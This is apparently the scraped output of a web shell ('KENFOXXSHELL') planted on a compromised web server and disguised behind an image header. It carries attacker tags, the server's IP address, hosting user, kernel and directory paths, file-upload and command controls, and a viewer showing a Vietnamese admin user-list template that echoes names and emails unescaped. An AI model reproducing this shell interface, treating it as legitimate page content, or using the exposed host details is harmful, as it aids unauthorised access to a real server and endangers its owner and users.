JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/storage/framework/views/15535ea19e2fcbcc41d973b5cda1cdeb02d45858.php
<?php $__env->startSection('content'); ?>
<!-- Content Header (Page header) -->

<section class="content-header">

  <h1>

  
    <small>Tài khoản</small>

  </h1>

  <ol class="breadcrumb">

    <li><a href="admin"><i class="fa fa-dashboard"></i> Home</a></li>

    <li><a href="javascript:">Tài khoản</a></li>

   
  </ol>

</section>




<!-- Main content -->

<section class="content">

  <div class="row">

    <div class="col-xs-12">

      <div class="box">

        <?php echo $__env->make('admin.messages_error', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

        <!--<div class="box-header">

          <h3 class="box-title">Data Table With Full Features</h3>

        </div>-->

        <div class="box-body">

          <table id="example1" class="table table-bordered table-hover">

            <thead>

              <tr>

                <th class="text-center with_dieuhuong">Stt</th>

                <th>Tài khoản</th>

                <th>Tên</th>

                <th>Trạng tháng</th>
                <th>Hành động</th>

              </tr>

            </thead>

            <tbody>
                     <?php $__currentLoopData = $data; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $k=>$item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                      
    		      	<tr class="action-number">
    		      		<td class=""><?php echo e($k+1); ?></td>
    		      	    <td class="text-center"><?php echo $item->name; ?></td>
    		      		<td class="text-center"><?php echo $item->email; ?></td>
    		      	    <td class="text-center">
                           <?php if($item->status>0): ?>
                               <a href="admin/users/edituse?id=<?php echo e($item->id); ?>&hienthi=<?php echo e(time()); ?>" class="btn admin_status"><i class="fa fa-eye"></i> Tài khoản đang hoạt động</a>
                            <?php else: ?>
                              <a href="admin/users/edituse?id=<?php echo e($item->id); ?>&hienthi=<?php echo e(time()); ?>" style="background: red;" class="btn admin_status"><i class="fa fa-eye"></i> Đã Khóa tài khoản</a>
                            <?php endif; ?>
                         </td>
    		      		<td class="text-center"><a href="admin/users/edituse?id=<?php echo e($item->id); ?>" class="btn btn_edit">Chi tiết</a>
                           <a onClick="if(!confirm('Xác nhận xóa')) return false;" href="admin/users/<?php echo e($item->id); ?>/deleteuse" class="btn btn_del">Xóa</button></td>
    		      	</tr>
                   
    		        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>

            </tbody>

          </table>

         <?php echo e($data->links()); ?>


        </div><!-- /.box-body -->

        <div class="box-footer col-md-12">

          <div class="row">

            <div class="col-md-6">

              <input type="button" onclick="javascript:window.location='admin/users/adduse'" value="Thêm" class="btn btn-primary" />

            
              <input type="button" value="Thoát" onclick="javascript:window.location='admin'" class="btn btn-danger" />



            </div>

          </div>

        </div>

      </div><!-- /.box -->

    </div><!-- /.col -->

  </div><!-- /.row -->

</section><!-- /.content -->

<!------------------------------------------------------------------------->  
     
<?php $__env->stopSection(); ?>
<?php echo $__env->make('admin.master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team